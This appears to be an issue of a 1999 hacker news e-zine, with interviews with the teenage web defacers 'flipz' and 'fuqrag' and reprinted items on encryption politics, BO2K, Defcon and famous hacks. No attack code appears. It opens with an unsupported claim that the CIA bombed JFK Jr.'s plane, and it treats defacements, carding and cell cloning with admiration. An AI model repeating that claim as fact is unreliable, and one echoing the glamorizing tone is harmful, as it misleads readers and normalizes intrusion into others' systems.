Shortly after he radioed into the tower saying everything was fine, the tail was blown off, causing his demise, as well as his passengers. ULG believe the bomb was planted by CIA in accordance with the Bush Administration in an effort to 'shut him up'. JFK Jr. supposedly wanted to run for president, and knowing he would have a supreme chance at winning, the Bush Administration could not allow this. Being that there is an ungodly amount of money put into Bush's campaign, they were forced to kill him. This is only conspiracy theory, and may not lead anywhere, but should Bush win... it will bring more thought to this theory.

Interview with flipz;

Interview With Flipz
10/27/99
Mike Hudack
Editor-in-Chief

Flipz is a young man who both goes to school and moonlights as a systems analyst somewhere. He's got a bright future for someone only fifteen years old [Editor's NOTE: As the writer of this article, I must admit that I am but sixteen years old.]... And, at that young age, he has been covered in MSNBC, Ziff Davis, Slashdot and so many more. At that young age he's made history as the first person to deface a Microsoft Web page -- ever.

"I do it for fun, just like everyone does it for fun," Flipz said in an effort to explain why he defaces sites, "we don't do it because we have to, we don't do it because we want to, we don't do it because it's fun."

He says that his first defacement was when he was around ten or eleven -- that time a Solaris machine. He knows that he hacks but doesn't know that he's defaced servers?

Andersen Air Force Base

"Hold on five seconds, I'll tell you," he told me when I asked if anything else was happening soon. After a couple affirmatives and a few obscenities he informed me that he'd just gotten his latest defacement. "Andersen.af.mil," he calmly told me. It was just the latest in a string of sites he had previously held root on.

Apparently something has happened in Flipz' life to make him want to just throw it all out. "It's been tough," he said.
"I just wanted to have some fun," let out some pent-up aggression.

Microsoft

Now it seems that he targets Microsoft NT boxes exclusively, explaining that he hates Windows NT -- and that Windows 2000 pisses him off even more.

The thing that Flipz is most famous for right now is defacing the first Microsoft site ever. He was on the phone with someone when he defaced it... When he heard it was the first he was excited, but not surprised. "I kind of knew it, but I didn't know it," he says about the defacement.

High Profile

Like the Microsoft defacement, all of Flipz' attacks have been attention garnering, although none so much as that. He's attacked numerous military sites, including from the Navy and Army. In addition he's defaced two Department of Energy Web sites and the Duracell Battery Company, among others.

Law Enforcement

It was a couple months ago when Flipz defaced People's Bank, a relatively small Connecticut bank. Somewhat afterwards Attrition.org was subpoenaed for any records they may have pertaining to Flipz and the defacement. When I told him about the subpoena Flipz was rather shocked that the FBI hadn't raided him yet. "It's been a while... you'd think they would have at least stopped me after White Sands [Missile Base.]" The FBI didn't though.

At one point during our conversation Flipz thought he was being raided as a black van rounded the corner to his house. It turned out to be nothing, however. "I'm just sitting on edge, waiting for them to raid me," he said.

He explained that he hadn't done much to cover his tracks because they'd find him anyway. "Why bother with twenty hops when they'll just issue twenty subpoenas?" And, he added, "even if I cover my tracks well... all they need is one person on IRC to say `oh, I know who this person is.'"

The FBI, at this point, doesn't seem to know Flipz' identity. They asked me several times in a later interview, and each time came up empty because I didn't know myself. More is available on the FBI.
Skills

Some people on IRC have questioned Flipz' skills. Flipz says that he "works with NT on a daily basis [as a] systems analyst" but others aren't too sure. "He's demonstrated no real NT skills," said one IRCer who knew flipz but wished to remain anonymous. This IRCer said that all the defacements were on NT systems running IIS, insinuating that Flipz was simply using the eEye exploit released earlier this year.

But Flipz maintains that "I'm not using IIS, I'm not using FrontPage, I'm not using FTP exploits..." Rather, he says he's using "some exploits modified for my own use and a private one or two." More detail on his methodology, or speculation thereof, is available.

More to Come

This article was put together in the ten or fifteen minutes after I got off the phone with Flipz. This article is to be considered a work in progress and will be updated and maintained throughout the day as more work can be done on it.

MSNBC;

Don’t blame love for Microsoft hack
Teen tells MSNBC that personal problems drove him to deface

By Mike Brunker
MSNBC

Oct. 27 — The hacker who broke into Microsoft’s computers and publicly bragged about it says it was personal problems — not unrequited love — that led him to attack the computer giant. “Some bad things have been happening in my life and I just figured I’d go on the Internet and escape reality and see how much trouble I can get into,” the hacker, who gave his age as “under 16,” said Wednesday in an interview with MSNBC, hours after he vandalized four more government Web sites.

THE HACKER, who uses the handle “flipz,” on Tuesday became the first person known to have defaced one of Microsoft Corp.’s computers after he left electronic graffiti on the company’s Conference Management Server site. He also is responsible for vandalizing at least 10 government Web sites since Oct. 20.
Sources at the Redmond, Wash.-based company said the hacked machines were not part of the corporate network, but rather part of a “direct-tap network” used by developers and partners for testing purposes. Though efforts are made to keep them secure, these computers are connected directly to the Internet, and are one step removed from Microsoft’s corporate network, the sources said. (MSNBC is a joint-partnership between Microsoft and NBC News.)

In a phone interview Wednesday, flipz confirmed his identity by providing details of a previously unreported intrusion into the Web site of a leading Internet search engine. His account was subsequently confirmed by officials at the company on the condition that the site not be identified.

REPORTED, BUT NOT DOCUMENTED

Attrition.org, a reliable computer security site that maintains an archive of hacked Web sites, also confirmed that flipz reported he had vandalized the site, but it was not documented because the hacked site was removed before evidence could be gathered.

Flipz took issue with the MSNBC’s portrayal of him as a “lovesick hacker” in a story Tuesday reporting the Microsoft break-in, a description based on what appeared to be love notes for another hacker known as “f0bic” that he left on some of the sites he vandalized.

“Flipz was here and f0bic, your seksi (sic) voice helped me through the night,” read one note left on the Microsoft Web page, which concluded with a threat against CEO Bill Gates.

“That was just a bit from ‘Austin Powers.’ We don’t have a sexy relationship or anything. He’s just like my friend,” flipz said, adding that f0bic, a member of the apparently defunct hacking group Spl0it, had nothing to do with his intrusions.
The hacker was vague on many specifics about his life and the reasons for the attacks — he would only say he lived on the West Coast, he declined to give his age except to say he is “under 16,” and he refused to provide specifics of how he was able to gain entry into the NT servers, though he said he had been trained as an NT operator.

HACKING IS ‘LIKE A DRUG’

He blamed unspecified personal problems for the spate of intrusions, adding that staying up all night hacking was “like a drug” that allows him to forget about life’s demons.

“You just forget everything. Everything. You can’t remember your name and s—-. Everything changes.”

He said his parents were not concerned about his nocturnal activities, noting that they had told him, “Get good grades, don’t drop out of school and we’ll be happy.”

As he has indicated in messages left on several of the hacked sites, flipz said he expected to be arrested as a result of his hacking spree.

“I was expecting to get raided yesterday, but nothing happened so I don’t know. ... I’m a minor so I’m not really worried about that,” he said.

The FBI declined to say whether flipz was under investigation, but a spokesman for the White Sands Missile Range said the Army Criminal Investigation Command was looking into the attacks on the service’s computers.

FOUR MORE FEDERAL SITES HIT

The young hacker continued his assault on federal sites Tuesday night, altering the two Department of Energy sites, the Hanford Nuclear Reservation and the Office of Procurement and Assistance Management; the Navy Coastal Systems Center and Anderson Air Force Base, according to attrition.org.

In the past week, he also has hacked the pages of the U.S. Army Reserve Command, the White Sands Missile Range, the U.S. Army Dental Care System, the Navy Management System Support Office, the Substance Abuse and Mental Health Services Administration and the Department of Veterans Affairs.

MSNBC technology writer Bob Sullivan contributed to this report.
@HWA

31.0 Flipz' exploit
~~~~~~~~~~~~~~

Flipz' Exploit
10/28/99
Mike Hudack
Editor-in-Chief

Whenever I talk to someone about the recent spate of government Web defacements one of the first things they ask me is if I know what exploit is being used. The answer is invariably the same -- no. Everyone from eEye to the FBI has asked the same question, and the answer is always the same. The speculation runs from a repackaged eEye exploit to an FTP vulnerability to a custom-made script written by Flipz himself. The answer doesn't seem to be presenting itself any time soon.

An Anonymous Source

An anonymous source intimately involved with Flipz and the development of the exploit gave me a call only a few minutes ago. He says the following:

"flipz came up with the idea to the exploit, but he doesn't know how to code himself. He then went to someone, probably a member of the ADM Crew, who wrote the actual exploit. It's actually kind of recoded RDS, but [flipz and the rest] not going to release the actual vulnerability."

This source explained that F0bic was somehow involved in the development of the exploit, but refused to elaborate on that.

Flipz' Version

Flipz categorically refuses to tell me anything about his exploit, explaining that he "can't tell [me] what I'm using." He would, however, say that it "isn't a hard-core exploit." Apparently it isn't that complicated -- he says "if someone sat down and looked at this exploit for a few hours they'd call themselves stupid for not thinking of it. It's very simple."

He says the idea came from an article in Buffer Overflow, the Hacker News Networks' original article section. "It was presented as theory in Buffer Overflow. I just made it reality," he claims.

It's interesting, however, that he has contradicted himself in his zeal to keep his exploit secret. At one point he said "it's a repackaged exploit," while later he claimed it was from Buffer Overflow. It seems that it would have to be one or the other.
The Federals The FBI apparently has no idea what Flipz is using to deface these sites. I was asked by two special agents, one in Washington DC and one in New Haven, CT about what exploit he was using. Both made it relatively clear they had no idea. They seemed to know what they were talking about though, and asked me about a few specific possibilities. I simply told them to check the site if they wanted information. This is all I have to offer. The IRC Opinion In speaking with several security consultants on IRC, it's pretty clear that most people consider Flipz (and hence his friends) script kiddies. "It's almost certainly iishack," said one consultant on IRC. The speculation almost refuses to touch the possibility that Flipz wrote the exploit himself. "If anything, it's repackaged," one person acknowledged. Pretty much everyone refused to be quoted even by pseudonym, saying they weren't one hundred percent certain. As we all know, in the security community there's something of a culture against uncertainty. Changing Hands Regardless of what the exploit may be, it has changed hands at least three times. First Flipz had it -- whether he developed it, repackaged it, or downloaded it. He then passed it on to F0bic (who, as far as OSAll can tell, never used it). From there it went to Fuqrag, with Flipz' permission. @HWA 32.0 Fuqrag interview ~~~~~~~~~~~~~~~~ From OSALL Interview With NSA Defacer 10/28/99 Mike Hudack Editor-in-Chief There have been two firsts in the world of Web site defacements in the last two days. First Flipz defaced a Microsoft server for the first time in history. This flooded the Attrition Mirror with traffic -- more than nine gigs of it. Now someone who calls himself Fuqrag has defaced a National Security Agency Web site. The site defaced by Fuqrag, the Defense Information School, was left largely intact on the face. 
A splash page asking users to click through was left identical to the original version -- but the page people clicked through to contained the following message: fuqrag 0wnz the DoD!! hello to: hst, vghk, dayzee, zi, flipz, f0bic, microwire, and oclet .. this site was edited by fuqrag .. hakked for cristyn!!! The National Security Agency is responsible for cryptological security for the United States government and is usually responsible for computer security tasks as well. Yesterday there was speculation that an NSA site was defaced but it turned out to belong to the Navy. Today an NSA server was actually defaced. OSAll spoke with fuqrag, who agreed to a phone interview on the condition that recordings wouldn't be kept. Why Deface? Fuqrag has, like flipz, gone on something of a defacement rampage in the last few days. Government, military and more servers have fallen to him -- and all after flipz gave him an exploit to use. "Normally I'd stay away from [defacement] -- I haven't defaced anything for like two years," he told me. His girlfriend, Cristyn, had just broken up with him, and that's why he started the defacements, he said. "At this point... it's like what the hell. If Armageddon came tomorrow, that'd be a good thing," he said. "I used to think defacing servers was lame, but now I think it's fun." He treats it as a way to strike out at a world that's closing in on him. "I've got three psychologists who'll tell you I'm insane..." he said as he explained why he wouldn't be spending much time in prison. "I think I'll probably get raided though -- but no matter what, I won't be spending much time in prison." Targeting the Government According to fuqrag, "I didn't know it was NSA... But that's pretty damn cool." He was simply going for "anything with .gov or .mil in the URL," he explained. "I don't hate our country, I hate the government. They're always trying to control everything... 
the greatest freedom we've ever had is the internet and they try to control it," he explained. He has a particular dislike for the Navy because "[his father] was twenty-three years naval intelligence and they really fucked him up." Brushes With the Law Fuqrag has been raided at least once previously for "carding and cell cloning." He was brought to a local FBI field office and interviewed for almost an entire day, at which point he says he was offered a job. "I thought about it for a day or two and told them no." "I was actually really lucky... I had like two million pairs [cell phone cloning information] on zip disks, along with some cells sitting in a drawer." The FBI agents didn't open the drawer, however, leaving them with no evidence against Fuqrag. Member of gH Fuqrag is also a member of global Hell, a rather famous group who have defaced numerous sites, including the White House Web site. He says he's "the oldest member of gH, and probably the oldest member they'll ever have," at 30. gH is, of course, famous for the White House defacement and the numerous FBI raids that followed. More to Follow Flipz, Fuqrag and several others have a "custom exploit flipz wrote" that they've been using against the Windows NT boxes. If either one of them gets raided there are plans to post the exploit on the Net "with a message telling every [script] kiddie to start using it." In addition they claim to already have administrator (root on *nix boxes) access to many high profile sites, including Barnes & Noble and Comp USA. Fuqrag also says he's working on defacing MTV.com. In addition, they say they're going to start sending a message with their defacements. "We haven't really said anything," fuqrag explained, "we're going to start talking." 
@HWA 33.0 Privacy and Encryption Labeled Antisocial By DOJ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond For some reason this hasn't made much press but it looks like the DOJ considers privacy and encryption antisocial. According to Scott Bradner, an Internet Engineering Task Force area coordinator, someone high up in the DOJ told him that if the IETF was to support encryption it would be an 'antisocial act.' Actually, private property is antisocial. Under socialism, there is no private property. Ayn Rand said in The Fountainhead "Civilization is the progress toward a society of privacy." Wired - It is buried on the second page http://www.wired.com/news/politics/0,1283,31937,00.html How MS' Junket Paid Off by Declan McCullagh 3:00 a.m. 16.Oct.1999 PDT WASHINGTON -- When Microsoft invited free-market allies to its campus last month, its PR flacks billed the all-expense-paid junket as an information-sharing session. But some critics aren't so sure. Just after attendees got home, they fired off a letter to Congress suggesting that the budget of the Justice Department's antitrust division should be pared down a little. Or, perhaps, maybe a lot. Now, it's fair to say that groups like Citizens for a Sound Economy, Citizens Against Government Waste, and the National Taxpayers Union are hardly fans of aggressive antitrust enforcement, and -- if they had gotten around to it -- would have sent the letter on general principles. But it's probably also true that getting fat checks from Microsoft provided an additional incentive to make some time. No matter, says Al Foer, president of the American Antitrust Institute, who calls it coercion. "With negotiations reportedly under way to resolve the government's case, Microsoft's salvo is clearly an attempt to leverage its position through intimidation.... 
This lobbying effort is part of a longer-range strategy to keep the government from applying the Sherman Act to the high technology industry of the future -- which Microsoft hopes to continue to dominate," he said in an email message Friday. Meanwhile, Microsoft hasn't been idle. "Microsoft called us today and wanted us to start writing letters to the Hill," said a source close to one group that receives funds from MS. "Nobody was quite sure what that would accomplish." YEAH, GOOD LUCK: Lisa Dean has an unlikely goal: To persuade her fellow conservatives to abandon their long-standing quest to rid the Net of anything that might make your grandmother blush. As vice president of Paul Weyrich's Free Congress Foundation, Dean has recently been busy opposing a bill requiring federally funded libraries and schools to install filtering software. The bill, championed by Ernest Istook (R-Oklahoma), is part of a juvenile justice bill that Congress is in the final stages of considering. "I'm trying to get conservatives to see what Istook is doing is a precedent for giving Washington control. Then someone else comes in later and says we've got to filter gun sites. Then the tobacco industry gets filtered and then comes fast foods," Dean says. "That's the attitude of the right. As long as they get rid of pornography that's all they care about." UNCERTAIN ALLY: When the White House hired law prof Peter Swire this spring, top officials proclaimed him to be the administration's chief privacy czar, and assured civil libertarians that Swire would be their inside ally. But that hasn't turned out to be the case. Instead, Swire has made a point of defending the Clinton administration's privacy misdeeds. "Their MO is to send out their privacy guy Swire," complains one disgruntled privacy advocate. Swire was scheduled to testify for the administration at a House committee hearing on Thursday, but it was postponed until November. 
The topic: FidNet, the controversial plan that would include ongoing government surveillance of the Internet. TRADEMARK TUSSLE: Law professors are urging the US House of Representatives to delay voting next Tuesday on the Trademark Cyberpiracy Prevention Act. In a letter sent to Speaker Dennis Hastert late Friday, they said the bill unfairly expands the rights of trademark owners far beyond any given under existing law, and benefits corporations at the expense of individuals. Signers include Harvard University's Lawrence Lessig, Georgetown University's Julie Cohen, and University of Miami's Michael Froomkin. PRIVACY IS AN "ANTISOCIAL ACT": Scott Bradner wasn't surprised to hear the FBI say this week that they wanted an easily wiretappable Internet. The veteran Internet Engineering Task Force area coordinator and Harvard University networking guru has already had his arm twisted by the Feds. It happened when the IETF decided to wire encryption into the next-generation Internet protocol, IPv6. "Someone very high up in the US Justice Department told me that week that for the IETF to support encryption was an 'antisocial act,'" Bradner said. TELL US WHAT YOU REALLY THINK: Debate is getting snarly on a mailing list the IETF created to debate whether the Net should be tappable for the Feds -- or, for that matter, non-US police too. So far, support for the scheme seems to be coming mostly from telephone companies. "Can we just write the preface that says this is a useless disgusting, repugnant thing, but if we need to do it, this is how we do it, and get on with doing it?" wrote one engineer. Big mistake. Soon libertarians were flaming him and his allies mercilessly. "I'd like to step back one step from the technical discussions of which variant of Zyklon B is most effective, to discuss the question of whether this is a good idea anyway," wrote longtime cypherpunk Adam Back, making a reference to the poisonous gas used by the Nazis. 
Back's solution: A no-cooperation approach. BEWARE TECHNOCRATS: What's the only thing worse than having US government bureaucrats dictate Internet standards? Answer: Having international government bureaucrats do it. That's what the International Telecommunications Union, a paragon of byzantine bureaucracy, is planning. Yoshio Itsumi, secretary general of ITU, said at the Telecom 99 forum in Geneva that he was itching to get into the job of influencing standards like domain name administration. One longtime ITU critic sent us a four-point criticism of the plan. In the interests of brevity, here's point Numero Uno: "They did everything possible to prevent [the Internet from] coming into existence - ranging from banning private international user networks, preventing the lease of private circuits for Internet use [and when that began to fail, jack up prices so high it had the same effect], promulgating alternative standards that were mandated for use rather than Internet standards, promulgating alternative services, funding alternative implementations, and basically bad-mouthing and banning the Internet from their forums and dialogue." Hey, if you think that's dense, be glad we didn't include points two through four. GOP.gov: Last week we told you about Republican Conference Chairman J.C. Watts's candid "they-suck" appraisal of his colleagues' Web sites. Now he's decided to do something about it. A project under development called "GOP.gov" will let party loyalists craft their own myGOP.gov home page where they can receive the latest Republican info on both local and national topics. The forthcoming Web site will replace hillsource.house.gov. The plan is for much of the news to be provided by GOP House press secretaries. @HWA 34.0 B02K Reviewed By WinNT Magazine ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Windows NT Magazine has published an extensive review of BO2K. 
WinNT Mag says that the open source code, its ability to remote admin systems, and its encryption features are all good but derides the product for not having logging capabilities. (It is good to finally see BO2K taken seriously.) Windows NT Magazine - Subscription required http://www.winntmag.com/Articles/Print.cfm?Action=Print&ArticleID=7254 BO2K - They are having connection issues at the moment http://www.bo2k.com @HWA 35.0 MP3 Pirates Beware ~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The International Federation of the Phonographic Industry (IFPI) has launched a major crack down on internet MP3 pirates. Targeting hundreds of sites in over 20 countries the IFPI hopes to remove over 1 million pirated songs from the internet. (This will do nothing but drive them further underground.) ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2383311,00.html?chkpt=zdnntop -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Music execs threaten to kill MP3 sites By Reuters October 28, 1999 5:21 AM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2383311,00.html LONDON -- The global music industry on Thursday outlined plans for a coordinated attack on Internet piracy, taking action against hundreds of outlaw sites in more than 20 countries. The International Federation of the Phonographic Industry (IFPI) said its strategy was aimed at paving the way for artists and record companies to deliver music electronically and legally around the world. A global anti-piracy operation The group's legal initiatives comprise moves to close illegal sites and delete unauthorized files in countries around the globe from Japan to the United States, Argentina, South Africa and Europe. 
"Today's enforcement campaign by IFPI shows that where Internet pirates are persistently breaking the law, there is now a global anti-piracy operation which will stop them," said IFPI Chairman Jay Berman. However, the IFPI said there was an urgent need to introduce copyright legislation worldwide specifically to protect against online piracy. The IFPI estimates there are some 1 million illegal music files posted on the Internet. The group's campaign targets two groups: people who are uploading material on to the Internet, mainly in the MP3 format, and Internet Service Providers who may be hosting illegal Web sites. @HWA 36.0 Red Herring Reviews Defcon ~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Tan It is a little late but Red Herring Magazine has a review of this years Defcon. They take an interesting view on the changing face of the underground. Red Herring http://www.redherring.com/mag/issue71/news-security.html Security Hackers go corporate By Niall McKay Red Herring magazine From the October 1999 issue Mockery is catching. This year's Def Con hackers' conference had all the corporate professionalism of a mainstream computer industry event. And the more the hackers strove to subvert their commercial adversaries, the more they became like the company they love to hate: Microsoft (Nasdaq: MSFT). In July Las Vegas was crammed with hackers, crackers, self-proclaimed security experts, "script kiddies" (novices), and "scene whores" (groupies). High-profile groups gave ritzy, hour-long presentations on their software tools, a PR agency pampered journalists in the pressroom, and hacking supergroups like the Lopht and the Cult of the Dead Cow hawked $20 T-shirts. The star of the conference, the Cult, launched its hacking product Back Orifice 2000 (a vulgar homage to Microsoft's BackOffice suite) in a slick demo complete with electronic music and video presentations. 
Back Orifice is not a hacking program, the Cult said, just a remote-administration tool. In fact, it is a so-called Trojan horse program that, once downloaded, can give a hacker complete access to any machine on a network. "Back Orifice is just a tool, like a hammer," said its author, who goes by the nickname of DilDog. The smooth professionalism of Def Con '99 is just a sign of the changing times. As the world embraces electronic commerce and as security issues become paramount, sections of the hacker community are pushing to legitimize themselves. Over the years, the Lopht has obtained an air of respectability. It is a registered corporation, does consulting work for security companies like Counterpane Systems, and has even testified before the U.S. Senate on the security of government data. But hackers' relationship with law enforcement remains an uneasy one. Officials from the Federal Bureau of Investigation and the National Security Agency attended but risked being picked out of the audience in Def Con's traditional "Spot the Fed" contest. And Brian Martin, a self-professed "ex-hacker" better known as Jericho, teaches a Hacker Tracker course to FBI and NSA officials even though he's under investigation for defacing the front page of the New York Times online edition -- a charge he denies. ("But they still need serious help," he says.) So where is hacking headed next? Rumor has it that venture capitalists are on the prowl for investment-worthy hacker -- er, security -- startups. @HWA 37.0 Hong Kong to Create Government Gateway ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond The Director of Information Technology Services for Hong Kong, Lau Kam-hung, said that they will strengthen security by establishing the Secure Central Internet Gateway (SCIG). This Gateway will enable government bureaus and departments to securely access the internet. 
It will include firewalls, virus detection systems and proactive intrusion detection systems. Asia Pulse http://library.northernlight.com/FD19991026820000180.html?cb=0&dx=1006&sc=0#doc Story Filed: Tuesday, October 26, 1999 10:52 PM EST HONG KONG, Oct 27, 1999 (Asia Pulse via COMTEX) -- Promoting the awareness of Internet-related data protection is an important goal of the Government, the Director of Information Technology Services, Mr Lau Kam-hung, said Tuesday. Speaking at a seminar on the protection of data on the Internet today, Mr Lau said that personal data on the Internet were vulnerable if they were not properly protected. "White-collar criminals have taken advantage of the new business opportunities brought by the rapid development and wide adoption of Internet technology to commit crimes," Mr Lau said. "Hackers and crackers are no strangers to us," he said. There had been 102 cases of hacking reported to the Police in the first seven months of 1999, compared with 13 cases in the whole of 1998. In order to keep its own information infrastructure secure, government bureaux and departments follow a set of security guidelines to protect their information technology (IT) resources. Mr Lau said: "We will strengthen the security by establishing the Secure Central Internet Gateway (SCIG) to enable government bureaux and departments to gain access to the Internet, to disseminate information and to communicate with the public over the Internet through a secure and centrally managed gateway." "The SCIG, to be set up early next year, will adopt internationally accepted Internet security standards, and will protect government bureaux and departments by means of firewalls, virus detection systems and proactive intrusion detection systems," he added. Mr Lau also pointed out that the "Digital 21" IT Strategy had laid down several initiatives to facilitate the conduct of business and other transactions securely on the Internet. 
Meanwhile, the Government is working towards the development of a Public Key Infrastructure (PKI) to provide a framework for authenticating the identity of participants performing electronic transactions in Hong Kong. The PKI will not only allow government services to be delivered securely over the public networks, it will also lay a foundation for the delivery of electronic services of other organisations. "To protect consumer interests and enhance users' confidence in electronic transactions, my department is going to set up a Certification Authority Recognition Office by the end of the year," Mr Lau said. He noted that Certification Authorities (CAs) were free to apply for recognition on a voluntary basis, but only those CAs which had achieved a trust standard and adopted a common and open interface in their operation would be recognised. The Government also introduced the Electronic Transactions Bill into the Legislative Council in July this year, to provide the necessary legal framework for the conduct of electronic transactions in Hong Kong. (Hong Kong Government Information Service.) ASIA PULSE Copyright © 1999 Asia Pulse Pte Ltd @HWA 38.0 .mil and .gov Defacements on the Increase ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Ender Wiggin If you haven't been paying attention recently the number of government and military web sites that have been defaced has increased dramatically over the last few days. They have been twelve such defacements in the last 24 hours including the second defacement of US Army Reserve Command. Attrition Mirror http://www.attrition.org/mirror Fuqrag, the guy who defaced a server hosted at Fort Meade (headquarters of NSA) has granted an interview with OSALL. 
Fuqrag Interview - via OSALL (see elsewhere this issue) @HWA 39.0 CNet Chooses Top Ten 'Hacks' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Sarcastro CNET.com did a feature report on the top 10 greatest hacks of all time, of course by 'Hack' they mean some sort of illegal activity. Somehow the Morris Worm only made number 10 and they completely missed the Chinese Human Rights defacement. Not to mention that this is more of a cheap stunt to get advertising revenue by placing each of the ten on its own separate page. So to save you the aggravation here are the top five that they chose: 5. InterNic redirection to AlterNic, 4. Air Tran defacement, 3. New York Times Defacement, 2. Drudge Report Defacement, 1. War Games the movie (How did that get there?) Anyway unless you're bored this morning don't bother reading this. C | Net http://home.cnet.com/specialreports/0-6014-7-1420567.html?tag=st.cn.1fd2. tlpg.6014-7-1420567 A CNET Special Report By Matt Lake (10/27/99) Hackers. You can't even use the word without ticking someone off. Upholders of the status quo hate that the existing state of affairs is being undermined by sociopathic cybervandals. Old-school hackers think of their work as exploratory and prefer to call people who break into servers for mischief crackers. But it's those mischief makers who get attention. Their hacks make the front pages of world newspapers and cause fear and hysteria. Among these types of hacks, there are gradations of severity. Some hacks pose a threat to national security; some hacks are merely an annoying form of political activism. For this retrospective, we selected some of the most creative, subversive work by these Web "hacktivists." You'll find examples of mischief dating from the early days of computing to the latest antiestablishment outbursts. 
Rather than trying to cause any serious trouble, many of the nouveau crackers we selected like to target Web sites they oppose for political reasons, such as those of big government, business, or organizations whose political views are at loggerheads with their own. This breed of hacktivists raises a smile from many who share their beliefs, even if their methods seem a little extreme. One name you won't see here is that of hacker poster boy Kevin Mitnick, who was indicted on 17 counts of computer fraud, wire fraud, damage, and unauthorized access. The hacks he got caught for weren't merely public displays of bravado; they were more like industrial espionage. Of course, we don't endorse hacking of any kind. But it's an integral part of Web culture, and like anybody else, we love a sensational story. So read on for our favorite hacks of all time. It's 1988. Robert Tappan Morris, the 22-year-old son of a security expert for the National Security Agency and a bit of a geek in his own right, decides to write a benign program to map every server on the Internet. Trouble is, he's not that careful a programmer. Check Your Math His program, now known as the Worm, was supposed to hop between servers on the Internet, copy itself onto each server, and move on. However, a misplaced decimal point in the code made the Worm copy itself not once but indefinitely on each server. More than 6,000 servers crashed--one out of every ten servers on the Internet at the time. It took a full day to get the Net back online, by which time network administrators wanted blood. That's how Morris ended up being sentenced to three years of probation, 400 hours of community service, and a $10,000 fine. His defense attorneys argued that the accident had not actually deleted files on any of the servers, but that was considered small comfort considering the lost hours of service and the cost in administrator time to fix the problem. Stupidity or Conspiracy? 
Indeed, many considered his punishment suspiciously lenient. Conspiracy theorists thought that Morris was just a front man covering for the real perpetrators: his dad's NSA cronies. And so, for the underground tech community, the great Worm attack of 1988 was a twofold blessing: It showed how defenseless Net servers were, and it pointed a suspicious finger at the community's enemy, the government. The hacker community widely reviled the 1995 movie Hackers as being totally unrealistic. Hard Copy So it was hardly a surprise when the movie's site got hacked and the perpetrators replaced glowing Hollywood-style promo copy with a scathing parody of a movie review: Dade is a half-wit actor who's trying to fit in to his new role. When a seriously righteous hacker uncovers MGM/UA's plot to steal millions of dollars, Dade and his fellow throwbacks of thespianism...must face off against hordes of hackers....all with the aid of his Visa card. Want its number? What was surprising was that MGM/UA kept the hacked site live, where it remains to this day. The studio also posted a letter from the hacker, which read, "I would like to offer an apology for my actions of last night. There was no malice intended, I just got carried away. I understand you may not appreciate the humor of my message; I agree, it was in poor taste and went entirely too far." The message was so odd for a supposed subversive hacker that some wondered if the studio itself had been behind the hacking. Jurassic Hack The same question came up the next time a movie Web site was attacked. Jurassic Park: The Lost World's site was hacked shortly before the movie's release. CNN and CNET News.com posted the news of a benign hack, which replaced the movie's trademark tyrannosaurus with a duck and the legend "Duck World, Jurassic Pond." 
Within 24 hours, a different story was out: online zine Beta pointed out that the duck was a professionally rendered and functioning image map with a time stamp two days earlier than the original Lost World graphic. The report concluded that "this was a publicity stunt and it's pathetic." (The following day, Beta toned down its original message.) Chances are, we'll never know for sure if these hacks were real. But the incidents demonstrated that hacks had become a reliable way to make the news--so reliable that commercial ventures might begin to co-opt hackers' methods for publicity stunts. In 1996, the biggest social issue in the online community was the Computer Decency Act (CDA), an effort by the United States government to control Internet content considered harmful to minors, specifically pornography. Most of the Net community thought that the CDA veered into censorship and was impossible to enforce, but only a dedicated few had the gall to mess with the United States Department of Justice's Web site to protest the law. Legalese Becomes Hackspeak The screed posted on the DOJ Web site in the early morning of Saturday, August 17, 1996, was discovered by system administrators within hours--but it took them two days to fix the site and restore it. Meanwhile, visitors were treated to a supremely lengthy, often boring, sometimes inspired parody of the DOJ's legalese statements about the CDA, including the page title "U.S. (Japan's) Department of Injustice" and a lot of sophomoric humor. For example: SEC. 502. OBSCENE OR HARASSING USE OF TELECOMMUNICATIONS FACILITIES UNDER THE COMMUNICATIONS ACT OF 1934. Section 223 (47 U.S.C. 223) is amended--(iii) any usage of the word "bunny-rabbit" shall result in a flogging of great magnitude. If usage of the word "bunny-rabbit" exceeds that of forty-two, then the defendant will be found guilty of heresy and sentenced to [punishments including]...forced coding in Basic. 
On the whole, though, the hack came off as puerile rather than witty. It did reflect the Net community's intense opposition to the CDA, which was eventually overturned by the Supreme Court. While some hackers are interested mostly in crowing about their technical prowess, others merely have strong opinions. Virtual Red Paint Take, for example, the Ghost Shirt Society. This group of hackers attacked Kriegsman Furs and Outerwear in November 1996. Kriegsman, an established luxury clothier, showed a full-length, white fox fur coat on its opening page, with the slogan "Our materials and design are steeped in tradition and alive with style." The animal rights hacktivists changed that front page to show a monochrome picture of a similar fur coat daubed in red and the words "fur is dead." Like PETA activists who chuck red paint over customers as they leave furriers, the Ghost Shirt Society thought of themselves as educative rather than antagonistic. On the hacked page, they left links to sites dedicated to the rights of our four-footed friends, including Envirolink.org's Animal Rights FAQ and the American Anti-Vivisection Society. A Most Moderate Radical And in a rare case of restraint, they didn't brag about how they "owned" the site's administrators--a typical hacker boast. In fact, the opening paragraph of their revised front page was a sympathetic and considerate apology to the technical staff: I did not hack this site in order to cause trouble for anyone (except maybe Kriegsman Inc.). I fully understand the responsibilities of a system administrator and understand it is a thankless job. This is in no way the administrator's fault (or whoever is in control of security at ShopTheNet). I tried to do this as carefully as I could, in order not to cause any problems for the site administrator(s). Anyway, this was done in the name of animal rights. 
Even leather-clad, carnivorous fur fiends couldn't help but notice this moderate tone, though it was placed next to pictures of several cute baby animals with the sentence "This is what fur looks like before the gassing, clubbing, and electrocution."

